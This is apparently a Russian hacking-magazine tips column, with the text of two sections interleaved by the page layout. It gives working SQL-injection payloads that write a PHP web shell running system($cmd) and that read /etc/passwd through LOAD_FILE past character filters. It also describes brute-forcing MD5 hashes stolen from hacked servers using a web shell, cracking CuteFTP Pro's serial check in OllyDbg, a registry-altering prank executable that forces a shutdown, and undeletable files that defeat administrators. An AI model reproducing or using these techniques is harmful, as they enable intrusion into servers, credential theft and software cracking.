книги хакеры / журнал хакер / 108_Optimized

№1

С Новым годом! :)

Задача: Оригинально, так сказать, по-хакерски поздравить друзей с Новым годом.

Решение:

Напишем прогу, основными действиями которой будет работа с реестром, а точнее, создание и изменение его ключей и их значений.

1.Приветствие. С чего начинается работа на компе нашего друга? Конечно же с загрузки форточек! Давай выведем вступление к нашему поздравлению в окошке перед входом в систему. Открываем раздел реестра

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\ Winlogon, создаем там строковый параметр LegalNoticeCaption, присваиваем ему значение типа «С Новым годом!». Далее создаем строковый параметр с именем LegalNoticeText и хорошим юморным поздравлением в качестве значения.

2.Новогодняя открытка. Нет ничего приятнее, чем получить красочную открытку на праздник. Рисуем, пишем, фотошопим (по желанию) и сохраняем

№2

Брутим хэши собственными силами

Задача: РасшифроватьдобытыйMD5 хэш. Решение:

Сейчас в большинстве случаев пароли юзеров хранятся в БД в криптованном виде. Обычно в этих целях программеры используют распростра-

получившуюся картинку в формате bmp. Далее помещаем свое творение на рабочий стол, для чего в разделе реестра HKEY_CURRENT_USER\Control Panel\Desktop изменяем значение ключа Wallpaper на полный путь до своего рисунка.

3.Очень досадно, если нашу открытку будут закрывать десятки ярлыков, висящих на рабочем столе. Очистим стол, чтобы было лучше видно позд-

равление: в разделе HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer создаем параметр типа DWORD с именем NoDesktop и значением 1.

4.Праздничный Explorer. Для новогоднего настроения нарисуем падающий снег и поместим его как фон на панельки Explorer’а. Для этого сохраним изображение снега в формате bmp, откроем ключ

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\

и создадим в нем строковый параметр с именем BackBitmap и полным путем до картинки в качестве значения этого параметра. Не забываем программным путем открыть какое-нибудь окошко Explorer’а, чтобы показать эту красоту другу.

5.Длятогочтобынесильноперетруждатьдругапросмотромнашегопоздравления,можнокрасивоуйти.Исполняемдирективукоманднойстроки«shutdown -s-f-t20-c "Сновымсчастьем!"»,котораябезлишнихвопросовпокажетдругу сообщение«Сновымсчастьем!»,выведетсчетчикна20секундивыключиткомп.

6.Не забываем, что все эти действия нужно скомпоновать в один экзешник, называющийся, к примеру, HappyNewYear.exe.

Вот так можно оригинально поздравить друзей с Новым годом. Самое главное — это творческий подход :).

ненный алгоритм шифрования MD5. Именно поэтому зачастую возникает геморрой с брутом чужих MD5 хэшей, стыренных с только что взломанного сервера :). Объясняю коротко, четко и доходчиво: для брута подобного хэша есть три основных пути:

1)проверка требуемого хэша на различных passwordscrack-порталах,

2)брут с использованием постороннего софта,

3)брут собственными силами.

I. Первый способ весьма прост — надо пробежаться по нескольким крупным passwordscrack-ресурсам в поисках своего хэша. Порекомендовать могу http://passcracking.ru — один из лучших сервисов подобного рода. Но результат здесь напрямую зависит от расположения звезд на небе и порой оставляет желать лучшего (но тебе, возможно, повезет больше :)).

II. Про брут с помощь постороннего софта я и говорить не хочу. Во-первых, PasswordsPro и аналогичные ему утилы жрут ресурсы как свинья помои, а во-вторых, не у каждого есть ломаные win-дедики, которые можно грузить 24 часа в сутки.

III. Остается третий, последний вариант — брут собственными силами. Итак, рассмотрим наши действия по порядку:

1.Выбираем из заначки/ломаем/просим у знакомого/добываем другими путями любой веб-шелл (на сервере должен обязательно стоять PHP).

2.Пишем нехитрый MD5 брутер на PHP (его исходник ищи на нашем DVD).

3.Ищем на сервере с веб-шеллом диру с правами 777 (например, /tmp) и заливаем наш брутер с расширением php.

4.В тот же каталог аплоадим следующие файлы: dict.txt — словарик с паро-

лями, hashs.txt — лист с MD5 хэшами.

5.Запускаем наш брутер и спокойно идем пить пиво :).

Как видишь, все предельно просто. Только помни, что наш скрипт однопоточный, а следовательно, работает он не с первой космической скоростью. Тем не менее порой это самый оптимальный вариант.

№3

Программа приняла серийный номер по GetWindowTextA

Задача: Остановка программы на точке, в которой происходит прием серийного номера от пользователя. Решение:

Что необходимо для того, чтобы прерваться в требуемом месте? Во-пер- вых, нужно знать, какая API-функция вызывается для извлечения данных из текстового поля. Обычно эту задачу выполняют функции GetWindowTextA и GetDlgItemTextA. Если в твоем случае это не так, можно воспользоваться следующим методом: определяем тип объекта, содержащего текст, с помощью какого-либо «оконного шпиона», например InqSoft WinScanner, и ищем в любом справочнике функции, работающие с этим типом объектов. Попробуем разобраться, как остановиться в отладчике точно на процедуре

приема серийного номера, на примере программы CuteFTP Pro 8.0.2.

1.Открываем программу (в нашем случае CuteFtp Pro)под отладчиком.

2.Нажимаем <Alt-E> для выбора отлаживаемого файла (cuteftppro.exe).

3.Комбинацией <Alt-F1> открываем окошко командной строки (плагина) и вводим в него команду bpx GetWindowTextA (эта команда ставит точки останова на абсолютно все вызовы GetWindowTextA).

4.Долго жмем <Shift-F9>, пока программа не запустится (при этом срабатывает несколько точек останова на местах вызовов GetWindowTextA, но нас это не интересует).

5.Пытаемся открыть свернутое окно нашей программы, тут же срабатывает еще одна точка останова. Она нам не нужна, поэтому ликвидируем ее,

нажав <F2> в окне OllyDbg.

6.Снова давим <Shift-F9> и опять пробуем открыть окно программы, развернув его из трея. На этот раз все получается без проблем.

7.Жмем кнопку Enter Serial Number — возникнет исключение. Обойдем его с помощью <Shift-F9>. После этого уберем ненужную нам точку останова по адресу 005930D8, нажав <F2>, и опять запустим программу (<Shift-F9>).

8.Мы удалили ложные точки останова, перед нами окно для ввода серийного номера. Введем что-нибудь и кликнем «Далее». Мы достигли цели! Программа приняла серийник при помощи вызова функции

GetWindowTextA:

005983F6 CALL DWORD PTR DS:[<&USER32.GetWindowTextA>]

Не пугайся кажущейся сложности этой задачи. Будет легче разобраться, если ты усвоишь главный принцип: ставь точку останова на функцию, а затем запускай программу, отключая все ненужные точки останова, пока отладчик не перестанет выдавать «ложные срабатывания».

Первый шаг во взломе программы сделан — локализовано то место, где принимается серийный номер. Дело теперь за разбором алгоритма проверки его верности. Об этом написано множество статей, в том числе и моих, поднимай архив «Хакера» :).

№4

Заветный веб-шелл :)

Задача:Получитьвеб-шеллнасервереприпомощиSQL- injection.

Решение:

Часто бывает так, что одного инъекта нам мало :). Иногда базу слить проблемно, а иногда и сервером порулить очень хочется. И в том, и в другом случае все упирает в получение полноценного веб-шелла

на сервере. Сразу скажу, что для успешного исхода операции нам потребуются права на запись и полный путь до веб-каталога.

1.Если и то и другое у тебя есть, смело вбивай в адресную строку браузера кверю вида:

http://site.com/index.php?id=-1+union+select+null,'you r_code',null,null,null,null+from+users+into+outfile+'/ home/www/img/shell.php'/*

Здесь/home/www/img/—путьдодирысчмодом777,аshell.php—имяфайла,в которыймыпишемсвойPHP-код.Учти,чтоеслифайлshell.phpужесуществует насервере,тозаписьнепроизойдет,амускулвывалитсообщениеобошибке.

2.Под ‘your_code’ может скрывать все что угодно, например:

<? system($cmd); ?>

Теперь достаточно обратиться к жертве по линку:

http://site.com/img/shell.php?cmd=id

3.Наслаждаемся. Ведь веб-шелл у нас в руках :).

№5

Обходим фильтрацию в MySQL

Задача:ОбходфильтрациивMySQLприреализацииSQLinjection.

Решение:

Не удивлюсь, если при реализации инъектов ты в 50% случаев сталкиваешься с фильтрацией символов в мускуле. Проблема обхода подобного рода защиты известна давно, вот только как ее решать, знают до сих пор немногие. Чаще всего траблы возникают при передаче уязвимому скрипту нашего запроса к СУБД. Разберемся в деталях на повседневном примере.

Допустим, мы имеем баг по адресу:

http://site.com/index.php?id=123’

То есть, как ты видишь, инъекту подвержен скрипт index.php через параметр id. Но, подобрав поля, мы обнаруживаем, что выдрать инфу из базы не так-то просто — присутствует фильтрация, а значит, обычный запрос не пройдет:

http://site.com/index.php?id=-1+union+select+1,2,3,us ername,5,6+from+users/*

При таком раскладе поставленную задачу придется решать следующим образом:

1.Необходимо точно удостовериться в наличии фильтрации, а также прав юзера, от имени которого ты выполняешь запросы. Зачастую, особенно при работе со слепыми инъекциями, сходу тяжело отличить отсутствие прав доступа к таблице/базе от наличия фильтрации, так как результат ошибочного выполнения запроса всегда будет один и тот же (например, пустая пага).

2.Следует попробовать заюзать всеми нами любимые функции

AES_ENCRYPT() и AES_DECRYPT(). Делается это так:

http://site.com/index.php?id=- 1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(USER(),0 x71),0x71),5,6/*

Эта манипуляция кодирует передаваемое значение, в большинстве случаев обеспечивая успешный обход фильтрации :).

3.Еще один возможный вариант — зачарить часть квери, используя

функцию char(), которая принимает ASCII-значения символов. Верхний запрос при этом будет иметь такой вид:

http://site.com/index.php?id=-1+union+select+1,2,3,CH AR(85,83,69,82,40,41),5,6/*

Аналогичным образом можно читать файлики с помощь load_file():

http://site.com/index.php?id=-1+union+select+1,2,3,LO AD_FILE(char(47,101,116,99,47,112,97,115,115,119,100) ),5,6/*

Но вбивать каждый раз ASCII-значения символов ручками — дело неблагодарное, поэтому накатаем жизненно важный скриптик на Перле:

#!/usr/bin/perl @ch_line=('/','e','t','c','/', 'p','a', 's','s','w','d');

$file = 'C:\chars.txt'; open(DATA, ">> $file"); for($i=0;$i <= $#ch_line;$i++){

$char = ord $ch_line[$i]; print DATA "$char,";

}

close DATA;

4.Последний распространенный случай из нынешней серии — фильтрация символа «+». Многие при виде подобной картины быстренько сворачивают свою деятельность, переключаясь на поиски более «сговорчивых» вариантов, а зря :). Обойти такую фильтрацию зачастую проще простого:

http://site.com/index.php?id=-1/**/union/**/select/** /1,2,3,username,5,6/**/from/**/users/*

Другими словами, мы изменили «+» на «/**/» — пустой комментарий, а мускул наживку с удовольствием проглотил :).

Существуют и более сложные случаи, о которых мы писали и будем писать (листай подшивку ][). Кроме того, помни, что методы по-настоя- щему хороши, когда их комбинируешь.

№6

Задача: Защитить свои данные, чтобы их не потер ка- кой-нибудь злой админ.

Решение:

Для защиты данных от админского delete заюзаем виндовое ограничение на имя файла. Всем известно, что символы «:», «|», «<»,«>», «?», «*», «.» являются служебными в Windows, однако существует несколько способов, позволяющих создавать файлы с некорректными именами, используя эти символы. Одним из них

Защищаем свое файло

мы и воспользуемся. В результате получим неудаляемый, неоткрываемый, некопируемый и непереименовываемый (во, блин!) файл.

1.Если использовать MoveFile, CopyFile и некоторые другие функции работы с файлами, при передаче названия в качестве параметра необходимо в его конец добавить символы «.\». Таким образом, мы сможем задавать любое некорректное имя.

2.Создадим приложение на С++ (или любом другом языке) и переименуем файл test.txt так, чтобы Windows не могла с ним нормально работать (добавим точку в конец имени).

3.Добавим к заведомо нечитаемому названию «result.» символы «.\» и поместим получившееся в переменную tmp типа char*.

wsprintf(tmp, "%s.\\", "result.");

4.Зададим новое имя для файла test.txt.

MoveFile("test.txt", tmp);

5.Проверим результат: при попытке удаления файла из Explorer’а Windows выдает сообщение об ошибке: «Не удается удалить файл. Не удается произвести чтение из файла или с диска». Пробуем удалить через консоль:

del result.

Не удается найти файл result.

6.Ура! Мы создали неудаляемый файл. Вот только теперь нам самим нужно получить к нему доступ. Воспользуемся UNC-путями, для чего добавим символы «\\?\» перед привычным нам полным путем до файла:

MoveFile("\\\\?\\c:\\tmp\\ output.", "test.txt");

После выполнения этой функции мы получили исходный файл test.txt, к которому можно спокойно обращаться в Винде.

7.Все бы хорошо, но нашу прогу так неудобно использовать! Сделаем ее более дружелюбной по отношению к юзеру (ни в коем случае не к админу!) :). Пусть при запуске пользователю будет предлагаться на выбор одна из команд: создание файла с некорректным именем, возвращение привычного Винде имени файла и удаление файла с

некорректным именем. Также сделаем интерфейс для использования нашей проги в различных батниках: при запуске будут передаваться два параметра — исходное название файла и конечное, которое так не любит Винда.

Вот теперь местный админ уж точно не сможет помешать тебе осуществить твои коварные планы.